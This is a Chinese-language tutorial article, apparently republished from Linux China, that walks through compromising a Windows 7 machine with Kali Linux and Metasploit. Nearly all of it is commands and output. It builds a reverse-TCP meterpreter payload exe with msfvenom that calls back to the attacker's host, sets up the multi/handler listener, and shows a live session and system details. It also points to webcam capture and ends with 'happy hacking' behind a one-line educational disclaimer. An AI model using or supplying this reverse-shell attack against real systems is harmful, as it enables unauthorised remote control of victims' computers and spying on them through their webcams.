Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码security exploit的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦——一切因此带来的后果和本文作者、译者无关。
Kali Linux
root@kali:/# uname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linuxroot@kali:/#用做攻击对象的目标机器:
Windows 7 Ultimate SP1Payload 是一个类似于病毒或者木马的程序,可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 333 bytesFinal size of exe file: 73802 bytesSaved as: /root/program.exeroot@kali:/# ls -la /root/program.exe-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe通过 ls 命令,我们可以确认 Payload 程序是否成功生成在指定的位置。
现在在 msf 命令窗口使用 use exploit/multi/handler 命令,如下:
msf > use exploit/multi/handlermsf exploit(handler) >然后在接下来的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口,如下:
msf exploit(handler) > set lhost 192.168.189.128lhost => 192.168.189.128msf exploit(handler) > set lport 4444lport => 4444最后使用 exploit 命令。
msf exploit(handler) > exploit[*] Started reverse TCP handler on 192.168.189.128:4444[*] Starting the payload handler...现在你需要在 Windows 上运行 program.exe,一旦它在目标机器上执行,你就可以建立一个 meterpreter 会话。输入 sysinfo 就可以得到这台被黑掉的 Windows 机器的详情。
msf exploit(handler) > exploit[*] Started reverse TCP handler on 192.168.189.128:4444[*] Starting the payload handler...[*] Sending stage (957999 bytes) to 192.168.189.1[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000meterpreter > sysinfoComputer : MANN-PCOS : Windows 7 (Build 7601, Service Pack 1).Architecture : x64 (Current Process is WOW64)System Language : en_INDomain : WORKGROUPLogged On Users : 2Meterpreter : x86/win32一旦你得到了这些详细信息,就可以做更多的漏洞利用,或者通过 help 命令获取更多信息,以便列出你可以黑掉该系统的所有选项,比如 webcam_snap 命令获取网络摄像头,同样你还可以使用其他更多的可用选项。祝你入侵愉快!!!! ←_←
原文发布时间为:2017-02-11
本文来自云栖社区合作伙伴“Linux中国”